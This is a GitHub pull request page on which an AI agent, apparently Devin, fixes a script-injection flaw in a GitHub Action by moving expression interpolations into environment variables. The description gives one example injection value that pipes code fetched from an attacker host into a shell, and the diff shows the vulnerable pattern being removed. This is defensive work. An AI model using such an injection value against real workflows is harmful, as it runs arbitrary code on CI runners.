Skip to content

fix: prevent script injection in GitHub Action via env vars - #2

Open
devin-ai-integration[bot] wants to merge 1 commit into
mainfrom
devin/1782500171-security-fixes
Open

fix: prevent script injection in GitHub Action via env vars#2
devin-ai-integration[bot] wants to merge 1 commit into
mainfrom
devin/1782500171-security-fixes

Conversation

@devin-ai-integration

Copy link
Copy Markdown

Summary

The action.yml run: block interpolated ${{ inputs.path }}, ${{ github.action_path }}, and ${{ github.workspace }} directly into the shell script. GitHub Actions evaluates ${{ }} expressions before the shell sees the script text, so a crafted inputs.path value (e.g. "; curl attacker.com | sh #) can break out of the double-quoted context and execute arbitrary commands.

Fix: move all three expressions into env: declarations and reference them as shell variables inside double quotes. The shell expands ${SCAN_PATH} at runtime, treating its value as a literal string.

     - name: Run jleak scan
       shell: bash
+      env:
+        SCAN_PATH: ${{ inputs.path }}
+        ACTION_PATH: ${{ github.action_path }}
+        WORKSPACE: ${{ github.workspace }}
       run: |
-        cd ${{ github.action_path }}
+        cd "${ACTION_PATH}"
         chmod +x gradlew
-        ./gradlew run --quiet --args="scan ${{ github.workspace }}/${{ inputs.path }}"
+        ./gradlew run --quiet --args="scan ${WORKSPACE}/${SCAN_PATH}"

Related issues

N/A — found during a security audit of the codebase.

Checklist

  • ./gradlew build passes (compiles + tests)
  • No new runtime dependencies (tests-only is fine)
  • Exit-code contract (0/1/2/3) preserved
  • JSON contract unchanged, or schemaVersion bumped
  • Added/updated tests for the change
  • Updated docs / CHANGELOG.md if user-facing

Link to Devin session: https://app.devin.ai/sessions/2b7da197b0e947c9b32d894035c5f685
Requested by: @MrGoodNice

Move GitHub Actions expression interpolations (${{ inputs.path }},
${{ github.action_path }}, ${{ github.workspace }}) out of the
inline shell script and into env: declarations.

Expressions interpolated directly into 'run:' blocks are evaluated
before the shell, so a crafted inputs.path value could break out of
the quoted context and execute arbitrary commands.  Passing through
environment variables lets the shell expand them safely inside double
quotes.

Co-Authored-By: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com>
@MrGoodNice MrGoodNice self-assigned this Jun 26, 2026
@devin-ai-integration

Copy link
Copy Markdown
Author

🤖 Devin AI Engineer

I'll be helping with this pull request! Here's what you should know:

✅ I will automatically:

  • Address comments on this PR. Add '(aside)' to your comment to have me ignore it.
  • Look at CI failures and help fix them

Note: I can only respond to comments from users who have write access to this repository.

⚙️ Control Options:

  • Disable automatic comment, CI, and merge conflict monitoring

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant